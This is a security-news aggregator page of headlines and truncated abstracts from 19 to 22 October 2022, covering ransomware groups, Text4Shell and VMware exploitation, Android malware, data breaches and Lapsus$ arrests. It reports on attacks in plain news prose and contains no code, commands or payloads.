Security researchers at McAfee have discovered a set of 16 malicious clicker apps that managed to sneak into Google Play, the official app store for Android.BleepingComputer
October 22, 2022 – General
A Worrisome Surge in DeadBolt Ransomware Attacks Full Text
Abstract
A recent study by Group-IB revealed that the DeadBolt ransomware group is targeting NAS devices and asks both the victim and the vendor to pay ransoms of 0.03–0.05 BTC and 10–50 BTC, respectively. A few days ago, the Dutch National Police carried out a targeted operation against the Deadbolt ransom ... Read MoreCyware Alerts - Hacker News
October 22, 2022 – Ransomware
TommyLeaks and SchoolBoys: Two sides of the same ransomware gang Full Text
Abstract
Two new extortion gangs named 'TommyLeaks' and 'SchoolBoys' are targeting companies worldwide. However, there is a catch — they are both the same ransomware gang.BleepingComputer
October 22, 2022 – General
Spikes in Cyberattacks Against Open-Source Repositories Full Text
Abstract
Open source software repositories have been subjected to a 633% year-over-year increase in cyber-attacks. The report states that 1.2 billion vulnerable Java dependencies are still getting downloaded each month, while the new and patched versions are getting ignored by the users.Cyware Alerts - Hacker News
October 22, 2022 – Government
Daixin Team targets health organizations with ransomware, US agencies warn Full Text
Abstract
US government agencies warned that the Daixin Team cybercrime group is actively targeting the U.S. Healthcare and Public Health sector with ransomware. CISA, the FBI, and the Department of Health and Human Services (HHS) warned that the Daixin Team...Security Affairs
October 22, 2022 – Vulnerabilities
Exploited Windows zero-day lets JavaScript files bypass security warnings Full Text
Abstract
A new Windows zero-day allows threat actors to use malicious JavaScript files to bypass Mark-of-the-Web security warnings. Threat actors are already seen using the zero-day bug in ransomware attacks.BleepingComputer
October 22, 2022 – Malware
New Clicker Android Malware Infects 20 Million Users Full Text
Abstract
Google Play Store kicked out 16 malicious apps, with a cumulative download of 20 million, that were propagating the Clicker malware for mobile ad fraud. Researchers highlight that the new Android malware is designed to disrupt the mobile advertising ecosystem. It enables its operators to generate r ... Read MoreCyware Alerts - Hacker News
October 22, 2022 – Vulnerabilities
Threat actors exploit critical flaw in VMware Workspace ONE Access to drop ransomware, miners Full Text
Abstract
Threat actors are exploiting a now-patched vulnerability, tracked as CVE-2022-22954, in VMware Workspace ONE Access in attacks in the wild. Threat actors are actively exploiting a now-patched vulnerability, tracked as CVE-2022-22954, in VMware Workspace...Security Affairs
October 22, 2022 – Vulnerabilities
Critical Flaw Reported in Move Virtual Machine Powering the Aptos Blockchain Network Full Text
Abstract
Researchers have disclosed details about a now-patched critical flaw in the Move virtual machine that powers the Aptos blockchain network. The vulnerability "can cause Aptos nodes to crash and cause denial of service," Singapore-based Numen Cyber Labs said in a technical write-up published earlier this month. Aptos is a new entrant to the blockchain space, which launched its mainnet on October 17, 2022. It has its roots in the Diem stablecoin payment system proposed by Meta (née Facebook), which also introduced a short-lived digital wallet called Novi . The network is built using a platform-agnostic programming language known as Move , a Rust-based system that's designed to implement and execute smart contracts in a secure runtime environment , also known as the Move Virtual Machine (aka MoveVM ). The vulnerability identified by Numen Cyber Labs is rooted in the Move language's verification module (" stack_usage_verifier.rs "), a comThe Hacker News
October 21, 2022 – Ransomware
The Week in Ransomware - October 21st 2022 - Stop the Presses Full Text
Abstract
Cybersecurity researchers did not disappoint, with reports linking RansomCartel to REvil, on OldGremlin hackers targeting Russia with ransomware, a new data exfiltration tool used by BlackByte, a warning that ransomware actors are exploiting VMware vulnerabilities, and finally, our own report on the Venus Ransomware.BleepingComputer
October 21, 2022 – General
Password Report: Honeypot Data Shows Bot Attack Trends Against RDP, SSH Full Text
Abstract
The report concludes that the use of long, strong random strings such as those generated by password managers and not likely to be included in ‘dictionaries’ would provide a very strong defense against opportunistic bot-driven automated attacks.Security Week
October 21, 2022 – Hacker
What Impact, if Any, Does Killnet Have? Full Text
Abstract
Killnet, the pro-Russian hacktivist collective, launched an ineffective DDoS attack on U.S. government websites earlier this month, leaving many to wonder what the purpose of such groups is and what impact they actually have, especially amid the war in Ukraine.Lawfare
October 21, 2022 – Breach
EnergyAustralia Electricity company discloses security breach Full Text
Abstract
Electricity company EnergyAustralia suffered a security breach, threat actors had access to information on 323 customers. Another Australian organization was hit by a severe cyber attack, this time the victim is the Electricity company EnergyAustralia....Security Affairs
October 21, 2022 – Government
US govt warns of Daixin Team targeting health orgs with ransomware Full Text
Abstract
CISA, the FBI, and the Department of Health and Human Services (HHS) warned that a cybercrime group known as Daixin Team is actively targeting the U.S. Healthcare and Public Health (HPH) Sector sector in ransomware attacks.BleepingComputer
October 21, 2022 – Malware
ERMAC Banking Trojan Targets Hundreds of Android Users Full Text
Abstract
Cyble detected a mass phishing campaign targeting Android users with the ERMAC banking trojan with the latest version of the trojan targeting 467 apps. The threat actor used typosquatted domains of popular Android application hosting platforms such as Google PlayStore, APKPure, and APKCombo.Cyware Alerts - Hacker News
October 21, 2022 – Botnet
Emotet Botnet Distributing Self-Unlocking Password-Protected RAR Files to Drop Malware Full Text
Abstract
The notorious Emotet botnet has been linked to a new wave of malspam campaigns that take advantage of password-protected archive files to drop CoinMiner and Quasar RAT on compromised systems. In an attack chain detected by Trustwave SpiderLabs researchers, an invoice-themed ZIP file lure was found to contain a nested self-extracting (SFX) archive, the first archive acting as a conduit to launch the second. While phishing attacks like these traditionally require persuading the target into opening the attachment, the cybersecurity company said the campaign sidesteps this hurdle by making use of a batch file to automatically supply the password to unlock the payload. The first SFX archive file further makes use of either a PDF or Excel icon to make it appear legitimate, when, in reality, it contains three components: the password-protected second SFX RAR file, the aforementioned batch script which launches the archive, and a decoy PDF or image. "The execution of the batch fThe Hacker News
October 21, 2022 – Vulnerabilities
Experts warn of CVE-2022-42889 Text4Shell exploit attempts Full Text
Abstract
Wordfence researchers warn of exploitation attempts targeting the recently disclosed flaw in Apache Commons Text dubbed Text4Shell. Experts at WordPress security firm Wordfence reported exploitation attempts targeting the recently disclosed flaw...Security Affairs
October 21, 2022 – Outage
Wholesale giant METRO hit by IT outage after cyberattack Full Text
Abstract
International wholesale giant METRO is experiencing infrastructure outages and store payment issues following a recent cyberattack.BleepingComputer
October 21, 2022 – Vulnerabilities
Vulnerabilities in Cisco Identity Services Engine Require Your Attention Full Text
Abstract
There are no workarounds available for the two flaws. And, while there’s currently a fix for CVE-2022-20959 (for one specific ISE version and patch level), other fixes are scheduled to be released in the coming months – some even in January 2023.Help Net Security
October 21, 2022 – Vulnerabilities
Multiple Campaigns Exploit VMware Vulnerability to Deploy Crypto Miners and Ransomware Full Text
Abstract
A now-patched vulnerability in VMware Workspace ONE Access has been observed being exploited to deliver both cryptocurrency miners and ransomware on affected machines. "The attacker intends to utilize a victim's resources as much as possible, not only to install RAR1Ransom for extortion, but also to spread GuardMiner to collect cryptocurrency," Fortinet FortiGuard Labs researcher Cara Lin said in a Thursday report. The issue, tracked as CVE-2022-22954 (CVSS score: 9.8), concerns a remote code execution vulnerability that stems from a case of server-side template injection. Although the shortcoming was addressed by the virtualization services provider in April 2022, it has since come under active exploitation in the wild. Fortinet said it observed in August 2022 attacks that sought to weaponize the flaw to deploy the Mirai botnet on Linux devices as well as the RAR1Ransom and GuardMiner , a variant of the XMRig Monero miner. The Mirai sample is retrieved frThe Hacker News
October 21, 2022 – Government
CISA adds Linux kernel flaw CVE-2021-3493 to its Known Exploited Vulnerabilities Catalog Full Text
Abstract
CISA added a Linux kernel vulnerability, tracked as CVE-2021-3493, to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week added a Linux kernel vulnerability, tracked...Security Affairs
October 21, 2022 – Vulnerabilities
Hackers exploit critical VMware flaw to drop ransomware, miners Full Text
Abstract
Security researchers observed malicious campaigns leveraging a critical vulnerability in VMware Workspace One Access to deliver various malware, including the RAR1Ransom tool that locks files in password-protected archives.BleepingComputer
October 21, 2022 – Vulnerabilities
Hackers Started Exploiting Critical “Text4Shell” Apache Commons Text Vulnerability Full Text
Abstract
WordPress security company Wordfence on Thursday said it started detecting exploitation attempts targeting the newly disclosed flaw in Apache Commons Text on October 18, 2022. The vulnerability, tracked as CVE-2022-42889 aka Text4Shell , has been assigned a severity ranking of 9.8 out of a possible 10.0 on the CVSS scale and affects versions 1.5 through 1.9 of the library. It's also similar to the now infamous Log4Shell vulnerability in that the issue is rooted in the manner string substitutions carried out during DNS, script, and URL lookups could lead to the execution of arbitrary code on susceptible systems when passing untrusted input. "The attacker can send a crafted payload remotely using 'script,' 'dns,' and 'url' lookups to achieve arbitrary remote code execution," Zscaler ThreatLabZ team explained . A successful exploitation of the flaw can enable a threat actor to open a reverse shell connection with the vulnerable appThe Hacker News
October 21, 2022 – Solution
GUAC – A Google Open Source Project to secure software supply chain Full Text
Abstract
Google launched the Graph for the Understanding Artifact Composition (GUAC) project, to secure the software supply chain. Google this week launched a new project named Graph for Understanding Artifact Composition (GUAC) which aims at securing the software...Security Affairs
October 21, 2022 – Policy and Law
Clearview AI gets third €20 million fine for illegal data collection Full Text
Abstract
France's data protection authority (CNIL) has fined Clearview AI with €20 million for illegal collection and processing of biometric data belonging to French citizens.BleepingComputer
October 21, 2022 – Government
A Quick Look at the “Strengthening America’s Cybersecurity” Initiative Full Text
Abstract
Acknowledging that you have a problem is the first step to addressing the problem in a serious way. This seems to be the reasoning for the White House recently announcing its "Strengthening America's Cybersecurity" initiative. The text of the announcement contains several statements that anyone who's ever read about cybersecurity will have heard many times over: increasing resilience, greater awareness, countering ransomware attacks – the list goes on. There are some novel aspects to the text as well, including a realization that cybersecurity is not, has never been, and will never be something that can be solved at the nation-state level. The White House also pointed to IoT warning labels as a solution – and reminded us all (and we do need reminding) about the importance of cybersecurity education. Let's take a look. International cooperation is critical A key point that the White House statement makes very clear is that cyberattacks are asymmetric in theThe Hacker News
October 21, 2022 – Malware
News URSNIF variant doesn’t support banking features Full Text
Abstract
A new variant of the popular Ursnif malware is used as a backdoor to deliver next-stage payloads and steal sensitive data. Mandiant researchers warn of a significant shift from Ursnif's original purpose, the malware initially used in banking frauds...Security Affairs
October 21, 2022 – Ransomware
BlackByte ransomware uses new data theft tool for double-extortion Full Text
Abstract
A BlackByte ransomware affiliate is using a new custom data stealing tool called 'ExByte' to steal data from compromised Windows devices quickly.BleepingComputer
October 21, 2022 – Breach
Microsoft Confirms Server Misconfiguration Led to 65,000+ Companies’ Data Leak Full Text
Abstract
Microsoft this week confirmed that it inadvertently exposed information related to thousands of customers following a security lapse that left an endpoint publicly accessible over the internet sans any authentication. "This misconfiguration resulted in the potential for unauthenticated access to some business transaction data corresponding to interactions between Microsoft and prospective customers, such as the planning or potential implementation and provisioning of Microsoft services," Microsoft said in an alert. Microsoft also emphasized that the B2B leak was "caused by an unintentional misconfiguration on an endpoint that is not in use across the Microsoft ecosystem and was not the result of a security vulnerability." The misconfiguration of the Azure Blob Storage was spotted on September 24, 2022, by cybersecurity company SOCRadar, which termed the leak BlueBleed . Microsoft said it's in the process of directly notifying impacted customers. The WinThe Hacker News
October 21, 2022 – Breach
Healthcare system Advocate Aurora Health data breach potentially impacted 3M patients Full Text
Abstract
Healthcare system Advocate Aurora Health (AAH) disclosed a data breach that exposed the personal data of 3,000,000 patients. The US-based hospital healthcare system Advocate Aurora Health (AAH) disclosed a data breach that exposed the personal data...Security Affairs
October 20, 2022 – Malware
Ursnif malware switches from bank account theft to initial access Full Text
Abstract
A new version of the Ursnif malware (a.k.a. Gozi) emerged as a generic backdoor, stripped of its typical banking trojan functionality.BleepingComputer
October 20, 2022 – Business
Health Insurer Pays Out $4.5 Million Over Bungled Data Security Full Text
Abstract
To put the fines in perspective: EyeMed's parent company Luxottica of America reportedly rakes in annual revenues exceeding $500 million. In other words: don't shed too many tears for the insurer over a $4.5 million check.The Register
October 20, 2022 – Solution
Google Launches GUAC Open Source Project to Secure Software Supply Chain Full Text
Abstract
Google on Thursday announced that it's seeking contributors to a new open source initiative called Graph for Understanding Artifact Composition , also known as GUAC, as part of its ongoing efforts to beef up the software supply chain . "GUAC addresses a need created by the burgeoning efforts across the ecosystem to generate software build, security, and dependency metadata," Brandon Lum, Mihai Maruseac, and Isaac Hepworth of Google said in a post shared with The Hacker News. "GUAC is meant to democratize the availability of this security information by making it freely accessible and useful for every organization, not just those with enterprise-scale security and IT funding." Software supply chain has emerged a lucrative attack vector for threat actors, wherein exploiting just one weakness -- as seen in the case of SolarWinds and Log4Shell -- opens a pathway long enough to traverse down the supply chain and steal sensitive data, plant malware, aThe Hacker News
October 20, 2022 – General
The Emerging Cyber Threat to the American Rail Industry Full Text
Abstract
Adding trains to the Internet of Things opens the door to a new threat: cyberattacks.Lawfare
October 20, 2022 – Malware
Experts spotted a new undetectable PowerShell Backdoor posing as a Windows update Full Text
Abstract
Cybersecurity researchers warn of a new PowerShell backdoor that disguises itself as part of the Windows update process to avoid detection. Cybersecurity researchers from SafeBreach a warning of a new PowerShell backdoor masqueraded as a Windows update...Security Affairs
October 20, 2022 – Policy and Law
Google sued over biometric data collection without consent Full Text
Abstract
Texas attorney general Ken Paxton has sued Google for allegedly collecting and using biometric data belonging to millions of Texans without proper consent.BleepingComputer
October 20, 2022 – Privacy
Smartphones of Iranian Protesters Targeted with Spyware Full Text
Abstract
Voice of America has obtained a copy of the spyware. In its report, the agency noted that the malware was previously distributed on different forums and titles such as Telegram with Free Internet.Hackread
October 20, 2022 – Ransomware
OldGremlin Ransomware Targeted Over a Dozen Russian Entities in Multi-Million Scheme Full Text
Abstract
A Russian-speaking ransomware group dubbed OldGremlin has been attributed to 16 malicious campaigns aimed at entities operating in the transcontinental Eurasian nation over the course of two and a half years. "The group's victims include companies in sectors such as logistics, industry, insurance, retail, real estate, software development, and banking," Group-IB said in an exhaustive report shared with The Hacker News. "In 2020, the group even targeted an arms manufacturer." In what's a rarity in the ransomware landscape, OldGremlin (aka TinyScouts) is one of the very few financially motivated cybercrime gangs that primarily focuses on Russian companies. Other notable groups consist of Dharma, Crylock, and Thanos, contributing to an uptick in ransomware attacks targeting businesses in the country by over 200% in 2021. OldGremlin first came to light in September 2020 when the Singapore-headquartered cybersecurity company disclosed nine campaigns orchThe Hacker News
October 20, 2022 – Breach
BlueBleed: Microsoft confirmed data leak exposing customers’ info Full Text
Abstract
Microsoft disclosed a data leak, sensitive data of some of its customers were exposed by a misconfigured Microsoft server accessible online. Microsoft announced that sensitive data belonging to some of its customers were exposed on the Internet due to a misconfigured...Security Affairs
October 20, 2022 – Breach
Health system data breach due to Meta Pixel hits 3 million patients Full Text
Abstract
Advocate Aurora Health (AAH), a 26-hospital healthcare system in the states of Wisconsin and Illinois, is notifying its patients of an unintentional data breach that impacts 3,000,000 individuals.BleepingComputer
October 20, 2022 – Outage
Internet Disruptions Observed as Russia Targets Critical Infrastructure in Ukraine Full Text
Abstract
Network data show major sustained impacts to infrastructure across much of Ukraine after a series of reprisal attacks by Russia; energy facilities have been targeted per President’s office.Security Affairs
October 20, 2022 – Malware
Hackers Using New Version of FurBall Android Malware to Spy on Iranian Citizens Full Text
Abstract
The Iranian threat actor known as Domestic Kitten has been attributed to a new mobile campaign that masquerades as a translation app to distribute an updated variant of an Android malware known as FurBall. "Since June 2021, it has been distributed as a translation app via a copycat of an Iranian website that provides translated articles, journals, and books," ESET researcher Lukas Stefanko said in a report shared with The Hacker News. The updates, while retaining the same surveillance functionality as earlier versions, are designed to evade detection by security solutions, the Slovak cybersecurity firm added. Domestic Kitten, also called APT-C-50, is an Iranian threat activity cluster that has been previously identified as targeting individuals of interest with the goal of harvesting sensitive information from compromised mobile devices. It's been known to be active since at least 2016. A tactical analysis conducted by Trend Micro in 2019 revealed Domestic KittenThe Hacker News
October 20, 2022 – Outage
Internet disruptions observed as Russia targets critical infrastructure in Ukraine Full Text
Abstract
While the Russian army is conducting coordinated missile and drone strikes in Ukraine experts observed Internet disruptions in the country. Starting on the morning of Monday, October 10, the Russian army is targeting several cities in Ukraine with...Security Affairs
October 20, 2022 – Attack
OldGremlin hackers use Linux ransomware to attack Russian orgs Full Text
Abstract
OldGremlin, one of the few ransomware groups attacking Russian corporate networks, has expanded its toolkit with file-encrypting malware for Linux machines.BleepingComputer
October 20, 2022 – Government
Biden Administration Issues New Cybersecurity Requirements for Rail Operators Full Text
Abstract
The new directive from the Transportation Security Administration requires rail companies to report hacking incidents to the Department of Homeland Security and to have a plan to keep a cybersecurity incident from hampering their operations.CNN Money
October 20, 2022 – Education
Not All Sandboxes Are for Children: How to Secure Your SaaS Sandbox Full Text
Abstract
When creating a Sandbox, the mindset tends to be that the Sandbox is considered a place to play around, test things, and there will be no effect on the production or operational system. Therefore, people don't actively think they need to worry about its security. This mindset is not only wrong, but extremely dangerous. When it comes to software developers, their version of sandbox is similar to a child's playground — a place to build and test without breaking any flows in production. Meanwhile, in the world of cybersecurity, the term 'sandbox' is used to describe a virtual environment or machine used to run suspicious code and other elements. Many organizations use a Sandbox for their SaaS apps — to test changes without disrupting the production SaaS app or even to connect new apps (much like a software developer's Sandbox). This common practice often leads to a false sense of security and in turn a lack of thought for its security implications. This article wiThe Hacker News
October 20, 2022 – Criminals
Brazilian police arrested a man suspected of being a member of LAPSUS$ gang Full Text
Abstract
The Federal Police of Brazil arrested an individual who is suspected of being a member of the notorious LAPSUS$ extortionist group. The Federal Police of Brazil yesterday announced the arrest of an individual suspected of being linked to the LAPSUS$...Security Affairs
October 20, 2022 – Criminals
Cybercriminals jailed for cryptocurrency theft, death threats Full Text
Abstract
On Wednesday, two Massachusetts men were sentenced to more than two years in prison each for stealing cryptocurrency in SIM swapping attacks and hijacking their victims' social media accounts.BleepingComputer
October 20, 2022 – Government
FBI Warning: Beware of Student Loan Forgiveness Scammers Full Text
Abstract
The scam the FBI is warning about involves cybercriminals and fraudsters purporting to provide entrance to the Federal Student Loan Forgiveness program. Fraudsters could contact potential victims via phone, email, text, websites, or chat services.ZDNet
October 20, 2022 – Malware
These 16 Clicker Malware Infected Android Apps Were Downloaded Over 20 Million Times Full Text
Abstract
As many as 16 malicious apps with over 20 million cumulative downloads have been taken down from the Google Play Store after they were caught committing mobile ad fraud. The Clicker malware masqueraded as seemingly harmless utilities like cameras, currency/unit converters, QR code readers, note-taking apps, and dictionaries, among others, in a bid to trick users into downloading them, cybersecurity firm McAfee said . The list of offending apps is as follows - High-Speed Camera (com.hantor.CozyCamera) - 10,000,000+ downloads Smart Task Manager (com.james.SmartTaskManager) - 5,000,000+ downloads Flashlight+ (kr.caramel.flash_plus) - 1,000,000+ downloads 달력메모장 (com.smh.memocalendar) - 1,000,000+ downloads K-Dictionary (com.joysoft.wordBook) - 1,000,000+ downloads BusanBus (com.kmshack.BusanBus) - 1,000,000+ downloads Flashlight+ (com.candlencom.candleprotest) - 500,000+ downloads Quick Note (com.movinapp.quicknote) - 500,000+ downloads Currency Converter (com.smartwho.SmaThe Hacker News
October 20, 2022 – Breach
Experts discovered millions of .git folders exposed to public Full Text
Abstract
Nearly two million .git folders containing vital project information are exposed to the public, the Cybernews research team found. Original Post at https://cybernews.com/security/millions-git-folders-exposed/ Git is the most popular open-source,...Security Affairs
October 20, 2022 – Hacker
Hacking group updates Furball Android spyware to evade detection Full Text
Abstract
A new version of the 'FurBall' Android spyware has been found targeting Iranian citizens in mobile surveillance campaigns conducted by the Domestic Kitten hacking group, also known as APT-C-50.BleepingComputer
October 20, 2022 – Malware
New Ursnif Variant Likely Shifting Focus to Ransomware and Data Theft Full Text
Abstract
The Ursnif malware has become the latest malware to shed its roots as a banking trojan to revamp itself into a generic backdoor capable of delivering next-stage payloads, joining the likes of Emotet, Qakbot, and TrickBot. "This is a significant shift from the malware's original purpose to enable banking fraud, but is consistent with the broader threat landscape," Mandiant researchers Sandor Nemes, Sulian Lebegue, and Jessa Valdez disclosed in a Wednesday analysis. The refreshed and refactored variant, first spotted by the Google-owned threat intelligence firm in the wild on June 23, 2022, has been codenamed LDR4, in what's being seen as an attempt to lay the groundwork for potential ransomware and data theft extortion operations. Ursnif, also called Gozi or ISFB, is one of the oldest banker malware families, with the earliest documented attacks going as far back as 2007. Check Point, in August 2020, mapped the " divergent evolution of Gozi " over thThe Hacker News
October 20, 2022 – Criminals
Brazilian Police Arrest Suspected Member of Lapsus$ Hacking Group Full Text
Abstract
The Federal Police of Brazil on Wednesday announced it had arrested an individual for purported links to the notorious LAPSUS$ extortionist gang. The arrest was made as part of a new law enforcement effort, dubbed Operation Dark Cloud, that was launched in August 2022, the agency noted. Not much is known about the suspect other than the fact that the person could be a teenager. The Polícia Federal said it commenced its investigation in December 2021 following an attack on websites under Brazil's Ministry of Health , resulting in the alleged exfiltration of 50TB of data and temporary unavailability of COVID-19 vaccination data of millions of citizens. Other federal government portals targeted by the LAPSUS$ group in Brazil include the Ministry of Economy, Comptroller General of the Union, and the Federal Highway Police. "The crimes determined in the police investigation are those of criminal organization, invasion of a computer device, interruption or disturbance of teThe Hacker News
October 19, 2022 – Policy and Law
Brazil arrests suspect believed to be a Lapsus$ gang member Full Text
Abstract
Today, the Brazilian Federal Police arrested a Brazilian suspect in the city of Feira de Santana, Bahia, believed to be part of the Lapsus$ extortion gang.BleepingComputer
October 19, 2022 – Criminals
Brazil arrests suspect linked to the Lapsus$ hacking group Full Text
Abstract
Today, the Brazilian Federal Police arrested a Brazilian suspect in the city of Feira de Santana, Bahia, believed to be part of the Lapsus$ extortion gang.BleepingComputer
October 19, 2022 – General
Cyber Talent Still in High Demand Full Text
Abstract
The cyber workforce count for the most recent 12-month period is over 1.1 million. For the public sector in particular, 47,114 cyber jobs were listed and 72,599 workers were employed.Nextgov
October 19, 2022 – Vulnerabilities
Researchers Detail Azure SFX Flaw That Could’ve Allowed Attackers to Gain Admin Access Full Text
Abstract
Cybersecurity researchers have shared more details about a now-patched security flaw in Azure Service Fabric Explorer (SFX) that could potentially enable an attacker to gain administrator privileges on the cluster. The vulnerability, tracked as CVE-2022-35829 , carries a CVSS severity rating of 6.2 and was addressed by Microsoft as part of its Patch Tuesday updates last week. Orca Security, which discovered and reported the flaw to the tech giant on August 11, 2022, dubbed the vulnerability FabriXss (pronounced "fabrics"). It impacts Azure Fabric Explorer version 8.1.316 and prior. SFX is described by Microsoft as an open-source tool for inspecting and managing Azure Service Fabric clusters, a distributed systems platform that's used to build and deploy microservices-based cloud applications. The vulnerability is rooted in the fact that a user with permissions to "Create Compose Application" through the SFX client can leverage the privilegesThe Hacker News
October 19, 2022 – Policy and Law
The Fallout From the First Trial of a Corporate Executive for ‘Covering Up’ a Data Breach Full Text
Abstract
The Justice Department should issue guidance to clarify the line between covering up a data breach and merely declining to disclose it.Lawfare
October 19, 2022 – Vulnerabilities
Text4Shell, a remote code execution bug in Apache Commons Text library Full Text
Abstract
Researcher discovered a remote code execution vulnerability in the open-source Apache Commons Text library. GitHub's threat analyst Alvaro Munoz discovered a remote code execution vulnerability, tracked as CVE-2022-42889, in the open-source Apache...Security Affairs
October 19, 2022 – Breach
Microsoft data breach exposes customers’ contact info, emails Full Text
Abstract
Microsoft said today that some of its customers' sensitive information was exposed by a misconfigured Microsoft server accessible over the Internet.BleepingComputer
October 19, 2022 – Solution
Google Unveils KataOS ‘Verifiably-Secure’ Operating System for Embedded Devices Full Text
Abstract
The project is named Sparrow and it revolves around a new operating system named KataOS, for which Google has already open-sourced several components. The tech giant pointed out that KataOS is mostly developed in Rust, which makes it more secure.Security Week
October 19, 2022 – Attack
Chinese Hackers Targeting Online Casinos with GamePlayerFramework Malware Full Text
Abstract
An advanced persistent threat (APT) group of Chinese origin codenamed DiceyF has been linked to a string of attacks aimed at online casinos in Southeast Asia for years. Russian cybersecurity company Kaspersky said the activity aligns with another set of intrusions attributed to Earth Berberoka (aka GamblingPuppet ) and DRBControl , citing tactical and targeting similarities as well as the abuse of secure messaging clients. "Possibly we have a mix of espionage and [intellectual property] theft, but the true motivations remain a mystery," researchers Kurt Baumgartner and Georgy Kucherin said in a technical write-up published this week. The starting point of the investigation was in November 2021 when Kaspersky said it detected multiple PlugX loaders and other payloads that were deployed via an employee monitoring service and a security package deployment service. The initial infection method – the distribution of the framework through security solution packagesThe Hacker News
October 19, 2022 – Vulnerabilities
Researchers share of FabriXss bug impacting Azure Fabric Explorer Full Text
Abstract
Cybersecurity researchers published technical details about a now-patched FabriXss flaw that impacts Azure Fabric Explorer. Orca Security researchers have released technical details about a now-patched FabriXss vulnerability, tracked as CVE-2022-35829...Security Affairs
October 19, 2022 – Solution
Microsoft announces enterprise DDoS protection for SMBs Full Text
Abstract
Microsoft announced today the availability of Azure DDoS IP Protection in public preview, a new and fully managed DDoS Protection pay-per-protected IP model offering tailored to small and midsize businesses (SMBs).BleepingComputer
October 19, 2022 – Breach
Online Wine Retailer iDealwine Suffered a Data Breach Full Text
Abstract
It has informed its customers that their name, address, telephone number and email address may have been compromised. Customers' credit card/bank information has not been compromised, since it’s not stored on company servers.Help Net Security
October 19, 2022 – Education
A Quick Guide for Small Cybersecurity Teams Looking to Invest in Cyber Insurance Full Text
Abstract
In the world of insurance providers and policies, cyber insurance is a fairly new field. And many security teams are trying to wrap their heads around it. What is it and do they need it? And with what time will they spend researching how to integrate cyber insurance into their strategy? For small security teams, this is particularly challenging as they contend with limited resources. Luckily, there's a new eBook dedicated to helping small security teams better understand cyber insurance policies and how they may impact an organization's cybersecurity measures. Background In 1997, the "Internet Security Liability" (ISL) insurance policy was launched at the International Risk Insurance Management Society's convention in Honolulu. Underwritten by AIG, ISL insurance was designed to protect ecommerce retailers like Amazon that were collecting sensitive customer data and storing it on internal networks. It is credited as one of the very first cyber insurance policies to be made avaThe Hacker News
October 19, 2022 – Criminals
The missed link between Ransom Cartel and REvil ransomware gangs Full Text
Abstract
Researchers at Palo Alto Network's Unit 42 linked the Ransom Cartel ransomware operation to the REvil ransomware operations. Researchers at Palo Alto Network's Unit 42 have linked the relatively new Ransom Cartel ransomware operation with the notorious...Security Affairs
October 19, 2022 – Attack
Hackers use new stealthy PowerShell backdoor to target 60+ victims Full Text
Abstract
A previously undocumented, fully undetectable PowerShell backdoor is being actively used by a threat actor who has targeted at least 69 entities.BleepingComputer
October 19, 2022 – Breach
LockBit Claims 1.4TB of Data Theft from U.K Insurance Firm Full Text
Abstract
The IT team blocked all external access and affected servers were brought offline as soon as the cyberattack became known, but the investigation concluded that business operations have not been impacted.Heimdal Security
October 19, 2022 – Vulnerabilities
Experts Warn of Stealthy PowerShell Backdoor Disguising as Windows Update Full Text
Abstract
Details have emerged about a previously undocumented and fully undetectable (FUD) PowerShell backdoor that gains its stealth by disguising itself as part of a Windows update process. "The covert self-developed tool and the associated C2 commands seem to be the work of a sophisticated, unknown threat actor who has targeted approximately 100 victims," Tomer Bar, director of security research at SafeBreach, said in a new report. Attributed to an unnamed threat actor , attack chains involving the malware commence with a weaponized Microsoft Word document that, per the company, was uploaded from Jordan on August 25, 2022. Metadata associated with the lure document indicates that the initial intrusion vector is a LinkedIn-based spear-phishing attack, which ultimately leads to the execution of a PowerShell script via a piece of embedded macro code. The PowerShell script ( Script1.ps1 ) is designed to connect to a remote command-and-control (C2) server and retrieve a commThe Hacker News
October 19, 2022 – Vulnerabilities
Microsoft Azure SFX bug let hackers hijack Service Fabric clusters Full Text
Abstract
Attackers could exploit a now-patched spoofing vulnerability in Service Fabric Explorer to gain admin privileges and hijack Azure Service Fabric clusters.BleepingComputer
October 19, 2022 – Vulnerabilities
WordPress Security Update 6.0.3 Patches 16 Vulnerabilities Full Text
Abstract
Researchers say, we found that these vulnerabilities are unlikely to be perceived as mass exploits, but several of them potentially present a mechanism for knowledgeable attackers to hack high-value sites via tailored attacks.Security Week
October 19, 2022 – Government
CISA Warns of Critical Flaws Affecting Industrial Appliances from Advantech and Hitachi Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released two Industrial Control Systems (ICS) advisories pertaining to severe flaws in Advantech R-SeeNet and Hitachi Energy APM Edge appliances. This consists of three weaknesses in the R-SeeNet monitoring solution, successful exploitation of which "could result in an unauthorized attacker remotely deleting files on the system or allowing remote code execution." The list of issues, which affect R-SeeNet Versions 2.4.17 and prior, is as follows - CVE-2022-3385 and CVE-2022-3386 (CVSS scores: 9.8) - Two stack-based buffer overflow flaws that could lead to remote code execution CVE-2022-3387 (CVSS score: 6.5) - A path traversal flaw that could enable a remote attacker to delete arbitrary PDF files Patches have been made available in version R-SeeNet version 2.4.21 released on September 30, 2022. Also published by CISA is an update to a December 2021 advisory about multiple flaws in HitacThe Hacker News
October 19, 2022 – Vulnerabilities
Apache Commons Text RCE flaw — Keep calm and patch away Full Text
Abstract
A remote code execution flaw in the open-source Apache Commons Text library has some people worried that it could turn into the next Log4Shell. However, most cybersecurity researchers say it is nowhere near as concerning.BleepingComputer
October 19, 2022 – Hacker
Winnti Threat Group Targets Government Organizations In Hong Kong and Srilanka Full Text
Abstract
In its latest activities, Winnti focused on Hong Kong and Srilankan organizations. It deployed Spyder Loader (Trojan.Spyload) malware on victim networks in Hong Kong, mostly as a part of the CuckooBees campaign.Heimdal Security
October 19, 2022 – Vulnerabilities
Explained: Log4Shell-like bugs Found in Apache Commons Text Full Text
Abstract
The flaw exists in Apache Commons Text, a library released in 2017 that focuses on algorithms enabling a variety of functionalities around strings. The proof-of-concept (PoC) code for the flaw is available.Aquasec
October 19, 2022 – Breach
Hackers Threaten to Release Stolen Medical Data of High-Profile Australians Full Text
Abstract
The unknown hackers claim to have 200 gigabytes of data from Medibank, a private health insurer in Australia that has roughly 3.9 million customers in a country of just 25 million people.Gizmodo
October 19, 2022 – Hacker
Is it TeamTNT Or a Copycat Group? Full Text
Abstract
Recent observations by researchers say a threat group, maybe TeamTNT, has returned. The copycat group is imitating the routines of TeamTNT and has been deploying an XMRig cryptocurrency miner.Trend Micro
October 19, 2022 – Vulnerabilities
Microsoft Office 365 Message Encryption (OME) doesn’t ensure confidentiality Full Text
Abstract
